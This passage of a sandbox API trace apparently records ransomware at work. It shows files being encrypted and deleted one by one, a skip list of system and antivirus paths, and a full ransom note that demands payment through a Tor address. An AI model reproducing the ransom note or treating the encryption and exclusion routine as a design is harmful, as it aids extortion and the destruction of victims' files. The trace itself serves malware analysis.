nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.223] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.223] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.223] GetLastError () returned 0x0 [0161.223] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.223] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.223] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0161.223] GetLastError () returned 0x0 [0161.223] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0161.223] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0161.223] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0161.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui")) returned 0x20 [0161.224] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0161.224] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui") returned 1 [0161.224] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui")) returned 0 [0161.224] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" [0161.224] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN") returned 1 [0161.224] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\.xXE927.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\.xxe927.tmp")) returned 0xe927 [0161.225] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\.xXE927.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\.xxe927.tmp"), dwFlags=0x1) returned 0 [0161.225] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\.xXE927.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\.xxe927.tmp")) returned 1 [0161.225] CryptDestroyKey (hKey=0x9ad178) returned 1 [0161.225] wcslen (_String="OK") returned 0x2 [0161.225] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.225] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.225] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0161.225] CryptDestroyHash (hHash=0x9ad138) returned 1 [0161.225] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0161.225] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0161.225] GetLastError () returned 0x12 [0161.225] FindClose (in: hFindFile=0x9ad1b8 | out: hFindFile=0x9ad1b8) returned 1 [0161.225] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0161.226] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.226] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.227] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0161.227] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.227] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.227] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0161.227] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.227] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*.exe") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*.dll") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*.lnk") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*.bat") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*.ini") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*.msi") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*.scf") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*pagefile.sys*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*NTUSER.DAT*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*AppData*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*\\winrar\\*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*\\java\\*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*\\windows\\*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*\\ESET\\*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*\\AVG\\*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*\\AVIRA\\*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*Atheros*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*Realtek*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*bootmgr*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*boot*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*boot*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*CONFIG.SYS*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*IO.SYS*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*MSDOS.SYS*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*NTDETECT.COM*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*ntldr*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*chrome*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*opera*") returned 0 [0161.227] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", pszSpec="*firefox*") returned 0 [0161.227] wcslen (_String="\\\\?\\") returned 0x4 [0161.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad238 [0161.228] wcscmp (_String1=".", _String2=".") returned 0 [0161.228] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.228] wcscmp (_String1="..", _String2=".") returned 1 [0161.228] wcscmp (_String1="..", _String2="..") returned 0 [0161.228] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0161.228] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0161.229] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0161.229] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-HK\\tipresx.dll.mui", pszSpec="*") returned 1 [0161.229] strlen (_Str="NMoreira") returned 0x8 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.229] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 